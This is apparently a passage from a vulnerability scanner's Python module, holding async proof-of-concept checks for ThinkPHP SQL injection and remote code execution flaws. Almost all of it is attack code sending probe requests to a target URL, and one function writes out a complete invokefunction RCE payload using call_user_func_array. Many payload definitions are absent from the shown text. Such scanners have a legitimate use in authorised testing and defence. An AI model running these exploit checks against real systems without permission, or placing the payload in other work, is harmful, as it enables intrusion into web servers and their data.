async def thinkphp_view_recent_xff_sqli_verify(url):
pocdict = get_pocdict(vulnname=__name__)
try:
vurl = urljoin(url, payload)
resp = requests.get(vurl, headers=headers, timeout=15, verify=False)
if '56540676a129760a' in resp.text:
pocdict['isvul'] = True
pocdict['vulnurl'] = vurl
pocdict['proof'] = '56540676a129760a'
pocdict['response'] = resp.text
except Exception as e:
pocdict['exception'] = str(e)
return pocdict
async def thinkphp_index_construct_rce_verify(url):
pocdict = get_pocdict(vulnname=__name__)
try:
url = urljoin(url, 'index.php?s=index/index/index')
resp = requests.post(url, data=payload, headers=headers, timeout=15, verify=False)
if '4e5e5d7364f443e28fbf0d3ae744a59a' in resp.text:
pocdict['isvul'] = True
pocdict['vulnurl'] = url
pocdict['payload'] = payload
pocdict['proof'] = '4e5e5d7364f443e28fbf0d3ae744a59a'
pocdict['response'] = resp.text
except Exception as e:
pocdict['exception'] = str(e)
return pocdict
async def thinkphp_construct_debug_rce_verify(url):
pocdict = get_pocdict(vulnname=__name__)
try:
url = urljoin(url, 'index.php')
resp = requests.post(url,
data=payload,
headers=headers,
timeout=15,
verify=False)
if '56540676a129760a3' in resp.text:
pocdict['isvul'] = True
pocdict['vulnurl'] = url
pocdict['payload'] = payload
pocdict['proof'] = '56540676a129760a3'
pocdict['response'] = resp.text
except Exception as e:
pocdict['exception'] = str(e)
return pocdict
async def thinkphp_index_showid_rce_verify(url):
pocdict = get_pocdict(vulnname=__name__)
try:
vurl = urljoin(url, payload1)
_ = requests.get(vurl, headers=headers, timeout=15, verify=False)
time_now = datetime.datetime.now().strftime("%Y_%m_%d")[2:]
resp = requests.get(url=urljoin(url, payload2.format(time_now)),
headers=headers,
timeout=15,
verify=False)
if '56540676a129760a3' in resp.text:
pocdict['isvul'] = True
pocdict['vulnurl'] = vurl
pocdict['proof'] = '56540676a129760a3 found'
pocdict['response'] = resp.text
except Exception as e:
pocdict['exception'] = str(e)
return pocdict
async def thinkphp_multi_sql_leak_verify(url):
pocdict = get_pocdict(vulnname=__name__)
results = []
for payload in payloads:
try:
vurl = urljoin(url, payload)
resp = requests.get(vurl,
headers=headers,
timeout=15,
verify=False)
if 'SQL syntax' in resp.text:
pocdict['isvul'] = True
pocdict['vulnurl'] = vurl
pocdict['proof'] = 'SQL syntax found'
pocdict['response'] = resp.text
except Exception as e:
pocdict['exception'] = str(e)
results.append(pocdict)
return results
async def thinkphp_checkcode_time_sqli_verify(url):
pocdict = get_pocdict(vulnname=__name__)
try:
start_time = time.time()
url = urljoin(url, 'index.php?s=/home/user/checkcode/')
resp = requests.post(url,
data=payload,
headers=headers,
timeout=15,
verify=False)
if time.time() - start_time >= 8:
pocdict['isvul'] = True
pocdict['vulnurl'] = url
pocdict['payload'] = payload
pocdict['proof'] = 'time sleep 8'
pocdict['response'] = resp.text
except Exception as e:
pocdict['exception'] = str(e)
return pocdict
async def thinkphp_invoke_func_code_exec_verify(url):
results, controllers = [], ['index']
resp = requests.get(url, headers=headers, timeout=15, verify=False)
matches = re.findall(pattern, resp.text)
for match in matches:
controllers.append(match.split('/')[1])
for controller in set(controllers):
pocdict = get_pocdict(vulnname=__name__)
try:
payload = f'index.php?s={controller}/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=2333'
vurl = urljoin(url, payload)
resp = requests.get(vurl, headers=headers, timeout=15, verify=False)
if '56540676a129760a3' in resp.text:
pocdict['isvul'] = True
pocdict['vulnurl'] = vurl
pocdict['proof'] = '56540676a129760a3'
pocdict['response'] = resp.text
except Exception as e:
pocdict['exception'] = str(e)
results.append(pocdict)
return results